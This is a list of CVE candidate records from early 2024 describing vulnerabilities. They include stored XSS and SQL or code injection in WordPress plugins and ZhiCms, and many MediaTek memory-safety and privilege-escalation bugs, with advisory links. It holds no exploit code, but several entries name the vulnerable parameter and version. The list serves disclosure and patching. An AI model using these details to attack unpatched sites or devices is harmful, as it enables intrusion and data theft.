CVE 2024 2020 Candidate The Calculated Fields Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form page href parameter in all versions up to, and including, 5.1.56 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Exploitation requires the professional version or higher. MISC:https://wordpress.org/plugins/calculated-fields-form/#developers | URL:https://wordpress.org/plugins/calculated-fields-form/#developers | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/45bfa9fb-f35b-4fd4-8553-cf87bf69df6b?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/45bfa9fb-f35b-4fd4-8553-cf87bf69df6b?source=cve Assigned (20240229)
CVE 2024 2016 Candidate A vulnerability, which was classified as critical, was found in ZhiCms 4.0. Affected is the function index of the file app/manage/controller/setcontroller.php. The manipulation of the argument sitename leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-255270 is the identifier assigned to this vulnerability. MISC:VDB-255270 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255270 | MISC:VDB-255270 | ZhiCms setcontroller.php index code injection | URL:https://vuldb.com/?id.255270 | MISC:https://gist.github.com/L1nyz-tel/e3ee6f3401a9d1c580be1a9b4a8afab5 | URL:https://gist.github.com/L1nyz-tel/e3ee6f3401a9d1c580be1a9b4a8afab5 Assigned (20240229)
CVE 2024 2015 Candidate A vulnerability, which was classified as critical, has been found in ZhiCms 4.0. This issue affects the function getindexdata of the file app/index/controller/mcontroller.php. The manipulation of the argument key leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255269 was assigned to this vulnerability. MISC:VDB-255269 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255269 | MISC:VDB-255269 | ZhiCms mcontroller.php getindexdata sql injection | URL:https://vuldb.com/?id.255269 | MISC:https://gist.github.com/L1nyz-tel/e3ee6f3401a9d1c580be1a9b4a8afab5 | URL:https://gist.github.com/L1nyz-tel/e3ee6f3401a9d1c580be1a9b4a8afab5 Assigned (20240229)
CVE 2024 2014 Candidate A vulnerability classified as critical was found in Panabit Panalog 202103080942. This vulnerability affects unknown code of the file /Maintain/sprog_upstatus.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255268. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-255268 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255268 | MISC:VDB-255268 | Panabit Panalog sprog_upstatus.php sql injection | URL:https://vuldb.com/?id.255268 | MISC:https://github.com/mashroompc0527/CVE/blob/main/vul.md | URL:https://github.com/mashroompc0527/CVE/blob/main/vul.md Assigned (20240229)
CVE 2024 2009 Candidate A vulnerability was found in Nway Pro 9. It has been rated as problematic. Affected by this issue is the function ajax_login_submit_form of the file login\index.php of the component Argument Handler. The manipulation of the argument rsargs[] leads to information exposure through error message. The attack may be launched remotely. VDB-255266 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-255266 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255266 | MISC:VDB-255266 | Nway Pro 9 Argument login\index.php ajax_login_submit_form rsargs[] information exposure | URL:https://vuldb.com/?id.255266 Assigned (20240229)
CVE 2024 2007 Candidate A vulnerability was found in OpenBMB XAgent 1.0.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Privileged Mode. The manipulation leads to sandbox issue. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The identifier VDB-255265 was assigned to this vulnerability. MISC:VDB-255265 | CTI Indicators (IOB, IOC, TTP) | URL:https://vuldb.com/?ctiid.255265 | MISC:VDB-255265 | OpenBMB XAgent Privileged Mode sandbox | URL:https://vuldb.com/?id.255265 | MISC:https://github.com/OpenBMB/XAgent/issues/386 | URL:https://github.com/OpenBMB/XAgent/issues/386 Assigned (20240229)
CVE 2024 2006 Candidate The Post Grid, Slider & Carousel Ultimate – with Shortcode, Gutenberg Block & Elementor Widget plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.6.7 via deserialization of untrusted input in the outpost_shortcode_metabox_markup function. This makes it possible for authenticated attackers, with contributor-level access and above, to inject a PHP Object. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. MISC:https://plugins.trac.wordpress.org/browser/post-grid-carousel-ultimate/trunk/includes/classes/metabox.php#L43 | URL:https://plugins.trac.wordpress.org/browser/post-grid-carousel-ultimate/trunk/includes/classes/metabox.php#L43 | MISC:https://plugins.trac.wordpress.org/changeset?old_path=/post-grid-carousel-ultimate/tags/1.6.7&old=3045923&new_path=/post-grid-carousel-ultimate/tags/1.6.8&new=3045923&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?old_path=/post-grid-carousel-ultimate/tags/1.6.7&old=3045923&new_path=/post-grid-carousel-ultimate/tags/1.6.8&new=3045923&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/8cf1b234-862b-41a0-ab63-a986f8023613?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/8cf1b234-862b-41a0-ab63-a986f8023613?source=cve Assigned (20240229)
CVE 2024 2005 Candidate In Blue Planet® products through 22.12, a misconfiguration in the SAML implementation allows for privilege escalation. Only products using SAML authentication are affected. Blue Planet® has released software updates that address this vulnerability for the affected products. Customers are advised to upgrade their Blue Planet products to the latest software version as soon as possible. The software updates can be downloaded from the Ciena Support Portal. MISC:https://www.ciena.com/product-security | URL:https://www.ciena.com/product-security Assigned (20240229)
CVE 2024 20038 Candidate In pq, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08495932; Issue ID: ALPS08495932. MISC:https://corp.mediatek.com/product-security-bulletin/March-2024 | URL:https://corp.mediatek.com/product-security-bulletin/March-2024 Assigned (20231102)
CVE 2024 20037 Candidate In pq, there is a possible write-what-where condition due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08495937; Issue ID: ALPS08495937. MISC:https://corp.mediatek.com/product-security-bulletin/March-2024 | URL:https://corp.mediatek.com/product-security-bulletin/March-2024 Assigned (20231102)
CVE 2024 20036 Candidate In vdec, there is a possible permission bypass due to a permissions bypass. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08509508; Issue ID: ALPS08509508. MISC:https://corp.mediatek.com/product-security-bulletin/March-2024 | URL:https://corp.mediatek.com/product-security-bulletin/March-2024 Assigned (20231102)
CVE 2024 20034 Candidate In battery, there is a possible escalation of privilege due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08488849; Issue ID: ALPS08488849. MISC:https://corp.mediatek.com/product-security-bulletin/March-2024 | URL:https://corp.mediatek.com/product-security-bulletin/March-2024 Assigned (20231102)
CVE 2024 20033 Candidate In nvram, there is a possible information disclosure due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08499945; Issue ID: ALPS08499945. MISC:https://corp.mediatek.com/product-security-bulletin/March-2024 | URL:https://corp.mediatek.com/product-security-bulletin/March-2024 Assigned (20231102)
CVE 2024 20032 Candidate In aee, there is a possible permission bypass due to a missing permission check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08487630; Issue ID: MSV-1020. MISC:https://corp.mediatek.com/product-security-bulletin/March-2024 | URL:https://corp.mediatek.com/product-security-bulletin/March-2024 Assigned (20231102)
CVE 2024 20031 Candidate In da, there is a possible out of bounds write due to lack of valudation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08541632; Issue ID: ALPS08541742. MISC:https://corp.mediatek.com/product-security-bulletin/March-2024 | URL:https://corp.mediatek.com/product-security-bulletin/March-2024 Assigned (20231102)
CVE 2024 20030 Candidate In da, there is a possible information disclosure due to improper input validation. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08541632; Issue ID: ALPS08541741. MISC:https://corp.mediatek.com/product-security-bulletin/March-2024 | URL:https://corp.mediatek.com/product-security-bulletin/March-2024 Assigned (20231102)
CVE 2024 20029 Candidate In wlan firmware, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08477406; Issue ID: MSV-1010. MISC:https://corp.mediatek.com/product-security-bulletin/March-2024 | URL:https://corp.mediatek.com/product-security-bulletin/March-2024 Assigned (20231102)
CVE 2024 20028 Candidate In da, there is a possible out of bounds write due to lack of valudation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08541632; Issue ID: ALPS08541687. MISC:https://corp.mediatek.com/product-security-bulletin/March-2024 | URL:https://corp.mediatek.com/product-security-bulletin/March-2024 Assigned (20231102)
CVE 2024 20027 Candidate In da, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08541632; Issue ID: ALPS08541633. MISC:https://corp.mediatek.com/product-security-bulletin/March-2024 | URL:https://corp.mediatek.com/product-security-bulletin/March-2024 Assigned (20231102)
CVE 2024 20026 Candidate In da, there is a possible information disclosure due to improper input validation. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08541632; Issue ID: ALPS08541632. MISC:https://corp.mediatek.com/product-security-bulletin/March-2024 | URL:https://corp.mediatek.com/product-security-bulletin/March-2024 Assigned (20231102)
CVE 2024 20025 Candidate In da, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08541686; Issue ID: ALPS08541686. MISC:https://corp.mediatek.com/product-security-bulletin/March-2024 | URL:https://corp.mediatek.com/product-security-bulletin/March-2024 Assigned (20231102)
CVE 2024 20024 Candidate In flashc, there is a possible out of bounds write due to lack of valudation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08541635; Issue ID: ALPS08541635. MISC:https://corp.mediatek.com/product-security-bulletin/March-2024 | URL:https://corp.mediatek.com/product-security-bulletin/March-2024 Assigned (20231102)
CVE 2024 20023 Candidate In flashc, there is a possible out of bounds write due to lack of valudation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08541638; Issue ID: ALPS08541638. MISC:https://corp.mediatek.com/product-security-bulletin/March-2024 | URL:https://corp.mediatek.com/product-security-bulletin/March-2024 Assigned (20231102)
CVE 2024 20022 Candidate In lk, there is a possible escalation of privilege due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08528255; Issue ID: ALPS08528255. MISC:https://corp.mediatek.com/product-security-bulletin/March-2024 | URL:https://corp.mediatek.com/product-security-bulletin/March-2024 Assigned (20231102)
CVE 2024 20020 Candidate In OPTEE, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08522504; Issue ID: ALPS08522504. MISC:https://corp.mediatek.com/product-security-bulletin/March-2024 | URL:https://corp.mediatek.com/product-security-bulletin/March-2024 Assigned (20231102)
CVE 2024 2002 Candidate A double-free vulnerability was found in libdwarf. In a multiply-corrupted DWARF object, libdwarf may try to dealloc(free) an allocation twice, potentially causing unpredictable and various results. MISC:RHBZ#2267700 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2267700 | MISC:https://access.redhat.com/security/cve/CVE-2024-2002 | URL:https://access.redhat.com/security/cve/CVE-2024-2002 | MISC:https://github.com/davea42/libdwarf-code/blob/main/bugxml/data.txt | URL:https://github.com/davea42/libdwarf-code/blob/main/bugxml/data.txt Assigned (20240229)
CVE 2024 20019 Candidate In wlan driver, there is a possible memory leak due to improper input handling. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00351241; Issue ID: MSV-1173. MISC:https://corp.mediatek.com/product-security-bulletin/March-2024 | URL:https://corp.mediatek.com/product-security-bulletin/March-2024 Assigned (20231102)
CVE 2024 20018 Candidate In wlan driver, there is a possible out of bounds write due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: WCNCR00348479; Issue ID: MSV-1019. MISC:https://corp.mediatek.com/product-security-bulletin/March-2024 | URL:https://corp.mediatek.com/product-security-bulletin/March-2024 Assigned (20231102)
CVE 2024 20017 Candidate In wlan service, there is a possible out of bounds write due to improper input validation. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation Patch ID: WCNCR00350938; Issue ID: MSV-1132. MISC:https://corp.mediatek.com/product-security-bulletin/March-2024 | URL:https://corp.mediatek.com/product-security-bulletin/March-2024 Assigned (20231102)
CVE 2024 20016 Candidate In ged, there is a possible out of bounds write due to an integer overflow. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation Patch ID: ALPS07835901; Issue ID: ALPS07835901. MISC:https://corp.mediatek.com/product-security-bulletin/February-2024 | URL:https://corp.mediatek.com/product-security-bulletin/February-2024 Assigned (20231102)
CVE 2024 20015 Candidate In telephony, there is a possible escalation of privilege due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08441419; Issue ID: ALPS08441419. MISC:https://corp.mediatek.com/product-security-bulletin/February-2024 | URL:https://corp.mediatek.com/product-security-bulletin/February-2024 Assigned (20231102)
CVE 2024 20013 Candidate In keyInstall, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08471742; Issue ID: ALPS08308608. MISC:https://corp.mediatek.com/product-security-bulletin/February-2024 | URL:https://corp.mediatek.com/product-security-bulletin/February-2024 Assigned (20231102)
CVE 2024 20012 Candidate In keyInstall, there is a possible escalation of privilege due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08358566; Issue ID: ALPS08358566. MISC:https://corp.mediatek.com/product-security-bulletin/February-2024 | URL:https://corp.mediatek.com/product-security-bulletin/February-2024 Assigned (20231102)
CVE 2024 20011 Candidate In alac decoder, there is a possible information disclosure due to an incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08441146; Issue ID: ALPS08441146. MISC:https://corp.mediatek.com/product-security-bulletin/February-2024 | URL:https://corp.mediatek.com/product-security-bulletin/February-2024 Assigned (20231102)
CVE 2024 20010 Candidate In keyInstall, there is a possible escalation of privilege due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08358560; Issue ID: ALPS08358560. MISC:https://corp.mediatek.com/product-security-bulletin/February-2024 | URL:https://corp.mediatek.com/product-security-bulletin/February-2024 Assigned (20231102)
CVE 2024 2001 Candidate A Cross-Site Scripting vulnerability in Cockpit CMS affecting version 2.7.0. This vulnerability could allow an authenticated user to upload an infected PDF file and store a malicious JavaScript payload to be executed when the file is uploaded. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-cockpit-cms | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-cockpit-cms Assigned (20240229)
CVE 2024 20009 Candidate In alac decoder, there is a possible out of bounds write due to an incorrect error handling. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS08441150; Issue ID: ALPS08441150. MISC:https://corp.mediatek.com/product-security-bulletin/February-2024 | URL:https://corp.mediatek.com/product-security-bulletin/February-2024 Assigned (20231102)
CVE 2024 20007 Candidate In mp3 decoder, there is a possible out of bounds write due to a race condition. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS08441369; Issue ID: ALPS08441369. MISC:https://corp.mediatek.com/product-security-bulletin/February-2024 | URL:https://corp.mediatek.com/product-security-bulletin/February-2024 Assigned (20231102)
CVE 2024 20006 Candidate In da, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08477148; Issue ID: ALPS08477148. MISC:https://corp.mediatek.com/product-security-bulletin/February-2024 | URL:https://corp.mediatek.com/product-security-bulletin/February-2024 Assigned (20231102)
CVE 2024 20005 Candidate In da, there is a possible permission bypass due to a missing permission check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08355599; Issue ID: ALPS08355599. MISC:https://corp.mediatek.com/product-security-bulletin/March-2024 | URL:https://corp.mediatek.com/product-security-bulletin/March-2024 Assigned (20231102)
CVE 2024 20004 Candidate In Modem NL1, there is a possible system crash due to an improper input validation. This could lead to remote denial of service, if NW sent invalid NR RRC Connection Setup message, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01191612; Issue ID: MOLY01195812 (MSV-985). MISC:https://corp.mediatek.com/product-security-bulletin/February-2024 | URL:https://corp.mediatek.com/product-security-bulletin/February-2024 Assigned (20231102)
CVE 2024 20003 Candidate In Modem NL1, there is a possible system crash due to an improper input validation. This could lead to remote denial of service, if NW sent invalid NR RRC Connection Setup message, with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01191612; Issue ID: MOLY01191612 (MSV-981). MISC:https://corp.mediatek.com/product-security-bulletin/February-2024 | URL:https://corp.mediatek.com/product-security-bulletin/February-2024 Assigned (20231102)
CVE 2024 20002 Candidate In TVAPI, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: DTV03961715; Issue ID: DTV03961715. MISC:https://corp.mediatek.com/product-security-bulletin/February-2024 | URL:https://corp.mediatek.com/product-security-bulletin/February-2024 Assigned (20231102)
CVE 2024 20001 Candidate In TVAPI, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: DTV03961601; Issue ID: DTV03961601. MISC:https://corp.mediatek.com/product-security-bulletin/February-2024 | URL:https://corp.mediatek.com/product-security-bulletin/February-2024 Assigned (20231102)
CVE 2024 2000 Candidate The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'navigation_dots' parameter of the Multi Scroll Widget in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://premiumaddons.com/change-log/ | URL:https://premiumaddons.com/change-log/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/eee517de-a47e-47c9-8322-92ce772191b0?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/eee517de-a47e-47c9-8322-92ce772191b0?source=cve Assigned (20240228)
CVE 2024 1998 Candidate ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2024-1795. Reason: This candidate is a reservation duplicate of CVE-2024-1795. Notes: All CVE users should reference CVE-2024-1795 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. Assigned (20240228)
CVE 2024 1997 Candidate The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'premium_fbchat_app_id' parameter of the Messenger Chat Widget in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://premiumaddons.com/change-log/ | URL:https://premiumaddons.com/change-log/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6ffa6a6b-bbb4-4361-8585-ce2cdb7d1d7e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6ffa6a6b-bbb4-4361-8585-ce2cdb7d1d7e?source=cve Assigned (20240228)
CVE 2024 1996 Candidate The Premium Addons PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's IHover widget link in all versions up to, and including, 2.9.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://premiumaddons.com/change-log/ | URL:https://premiumaddons.com/change-log/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/48fa5f3b-000b-406e-b7ee-51af5720cf72?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/48fa5f3b-000b-406e-b7ee-51af5720cf72?source=cve Assigned (20240228)
CVE 2024 1995 Candidate The Smart Custom Fields plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the relational_posts_search() function in all versions up to, and including, 4.2.2. This makes it possible for authenticated attackers, with subscrber-level access and above, to retrieve post content that is password protected and/or private. MISC:https://github.com/inc2734/smart-custom-fields/commit/67cb6d75bd8189668f721dbd2dc7a3036851be1b | URL:https://github.com/inc2734/smart-custom-fields/commit/67cb6d75bd8189668f721dbd2dc7a3036851be1b | MISC:https://plugins.trac.wordpress.org/browser/smart-custom-fields/trunk/classes/fields/class.field-related-posts.php#L78 | URL:https://plugins.trac.wordpress.org/browser/smart-custom-fields/trunk/classes/fields/class.field-related-posts.php#L78 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3052172%40smart-custom-fields&new=3052172%40smart-custom-fields&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3052172%40smart-custom-fields&new=3052172%40smart-custom-fields&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e966a266-4265-4a72-8a50-e872805219a7?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e966a266-4265-4a72-8a50-e872805219a7?source=cve Assigned (20240228)
CVE 2024 1992 Candidate ** REJECT ** Rejected as duplicate of CVE-2024-2306 Assigned (20240228)
CVE 2024 1989 Candidate The Social Sharing Plugin – Sassy Social Share plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'Sassy_Social_Share' shortcode in all versions up to, and including, 3.3.58 due to insufficient input sanitization and output escaping on user supplied attributes such as 'url'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/sassy-social-share/trunk/includes/class-sassy-social-share-sharing-networks.php#L65 | URL:https://plugins.trac.wordpress.org/browser/sassy-social-share/trunk/includes/class-sassy-social-share-sharing-networks.php#L65 | MISC:https://plugins.trac.wordpress.org/browser/sassy-social-share/trunk/includes/class-sassy-social-share-shortcodes.php#L228 | URL:https://plugins.trac.wordpress.org/browser/sassy-social-share/trunk/includes/class-sassy-social-share-shortcodes.php#L228 | MISC:https://plugins.trac.wordpress.org/browser/sassy-social-share/trunk/includes/class-sassy-social-share-shortcodes.php#L308 | URL:https://plugins.trac.wordpress.org/browser/sassy-social-share/trunk/includes/class-sassy-social-share-shortcodes.php#L308 | MISC:https://plugins.trac.wordpress.org/browser/sassy-social-share/trunk/public/class-sassy-social-share-public.php#L513 | URL:https://plugins.trac.wordpress.org/browser/sassy-social-share/trunk/public/class-sassy-social-share-public.php#L513 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3044857%40sassy-social-share%2Ftrunk&old=3038976%40sassy-social-share%2Ftrunk&sfp_email=&sfph_mail=#file6 | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3044857%40sassy-social-share%2Ftrunk&old=3038976%40sassy-social-share%2Ftrunk&sfp_email=&sfph_mail=#file6 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/bdceb07a-87d2-4708-b76b-5a8fcfff0818?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/bdceb07a-87d2-4708-b76b-5a8fcfff0818?source=cve Assigned (20240228)
CVE 2024 1987 Candidate The WP-Members Membership Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 3.4.9.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3047285%40wp-members%2Ftrunk&old=3025452%40wp-members%2Ftrunk&sfp_email=&sfph_mail=#file5 | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3047285%40wp-members%2Ftrunk&old=3025452%40wp-members%2Ftrunk&sfp_email=&sfph_mail=#file5 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/631e1061-50b1-4df2-b876-37b4cd3e2478?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/631e1061-50b1-4df2-b876-37b4cd3e2478?source=cve Assigned (20240228)
CVE 2024 1986 Candidate The Booster Elite for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the wc_add_new_product() function in all versions up to, and including, 7.1.7. This makes it possible for customer-level attackers, and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. This is only exploitable when the user product upload functionality is enabled. MISC:https://booster.io/ | URL:https://booster.io/ | MISC:https://plugins.trac.wordpress.org/browser/woocommerce-jetpack/trunk/includes/shortcodes/class-wcj-products-add-form-shortcodes.php#L132 | URL:https://plugins.trac.wordpress.org/browser/woocommerce-jetpack/trunk/includes/shortcodes/class-wcj-products-add-form-shortcodes.php#L132 | MISC:https://plugins.trac.wordpress.org/browser/woocommerce-jetpack/trunk/includes/shortcodes/class-wcj-products-add-form-shortcodes.php#L138 | URL:https://plugins.trac.wordpress.org/browser/woocommerce-jetpack/trunk/includes/shortcodes/class-wcj-products-add-form-shortcodes.php#L138 | MISC:https://plugins.trac.wordpress.org/browser/woocommerce-jetpack/trunk/includes/shortcodes/class-wcj-products-add-form-shortcodes.php#L322 | URL:https://plugins.trac.wordpress.org/browser/woocommerce-jetpack/trunk/includes/shortcodes/class-wcj-products-add-form-shortcodes.php#L322 | MISC:https://plugins.trac.wordpress.org/browser/woocommerce-jetpack/trunk/includes/shortcodes/class-wcj-products-add-form-shortcodes.php#L333 | URL:https://plugins.trac.wordpress.org/browser/woocommerce-jetpack/trunk/includes/shortcodes/class-wcj-products-add-form-shortcodes.php#L333 | MISC:https://wordpress.org/plugins/woocommerce-jetpack/ | URL:https://wordpress.org/plugins/woocommerce-jetpack/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c9c2fb7f-a05b-4852-97eb-7befe880d703?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c9c2fb7f-a05b-4852-97eb-7befe880d703?source=cve Assigned (20240228)
CVE 2024 1985 Candidate The Simple Membership plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Display Name' parameter in all versions up to, and including, 4.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This vulnerability requires social engineering to successfully exploit, and the impact would be very limited due to the attacker requiring a user to login as the user with the injected payload for execution. MISC:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L103 | URL:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L103 | MISC:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L112 | URL:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L112 | MISC:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L121 | URL:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L121 | MISC:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L130 | URL:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L130 | MISC:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L139 | URL:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L139 | MISC:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L157 | URL:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L157 | MISC:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L85 | URL:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L85 | MISC:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L95 | URL:https://plugins.trac.wordpress.org/browser/simple-membership/trunk/views/edit-v2.php#L95 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3045036%40simple-membership%2Ftrunk&old=3021218%40simple-membership%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3045036%40simple-membership%2Ftrunk&old=3021218%40simple-membership%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/8a6ca886-de4c-4d45-a934-3e90378e7eb3?source=cve | 